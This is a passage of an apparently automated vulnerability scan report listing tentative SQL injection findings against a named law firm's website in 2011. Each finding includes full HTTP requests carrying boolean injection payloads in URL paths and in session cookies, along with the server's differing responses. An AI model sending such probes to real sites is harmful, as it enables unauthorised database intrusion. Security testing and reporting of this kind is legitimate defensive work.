1.67. http://www.friedfrank.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico'%20and%201%3d1--%20 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank > Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>

<style type="text/css">

</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /favicon.ico'%20and%201%3d2--%20 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank > Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>

<style type="text/css">

</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.68. http://www.friedfrank.com/flash/perpetua.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/flash/perpetua.swf

Issue detail

Request 1

GET /flash'%20and%201%3d1--%20/perpetua.swf HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=1175
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank > Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>

<style type="text/css">

</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /flash'%20and%201%3d2--%20/perpetua.swf HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=1175
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank > Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>

<style type="text/css">

</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.69. http://www.friedfrank.com/index.cfm [CFID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/index.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 73239711%20or%201%3d1--%20 and 73239711%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=3134999873239711%20or%201%3d1--%20; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 21-Apr-2010 06:12:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=3134999873239711%20or%201%3d2--%20; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31397766;path=/
Set-Cookie: CFTOKEN=33204735;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="<STRONG>Ianis Girgenson </STRONG>is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. <BR><BR>Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.<BR><BR>Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.70. http://www.friedfrank.com/index.cfm [CFTOKEN cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/index.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 78527363%20or%201%3d1--%20 and 78527363%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=8841473878527363%20or%201%3d1--%20; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 21-Apr-2010 06:13:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=8841473878527363%20or%201%3d2--%20; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31397828;path=/
Set-Cookie: CFTOKEN=10675553;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="<STRONG>Ianis Girgenson </STRONG>is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. <BR><BR>Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.<BR><BR>Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.71. http://www.friedfrank.com/index.cfm [JSMOBILE cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/index.cfm

Issue detail

The JSMOBILE cookie appears to be vulnerable to SQL injection attacks. The payloads 21264174%20or%201%3d1--%20 and 21264174%20or%201%3d2--%20 were each submitted in the JSMOBILE cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=021264174%20or%201%3d1--%20; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:12:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=;expires=Wed, 21-Apr-2010 06:12:37 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=021264174%20or%201%3d2--%20; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:12:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8








































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="<STRONG>Ianis Girgenson </STRONG>is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. <BR><BR>Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.<BR><BR>Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank > Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.72. http://www.friedfrank.com/index.cfm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.friedfrank.com
Path:	/index.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 46764192'%20or%201%3d1--%20 and 46764192'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm46764192'%20or%201%3d1--%20?pageID=2 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=729&more=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; CFTOKEN=88414738; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:37:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank > Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>

<style type="text/css">

</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /index.cfm46764192'%20or%201%3d2--%20?pageID=2 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=729&more=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; CFTOKEN=88414738; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:37:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank > Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>

<style type="text/css">

</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
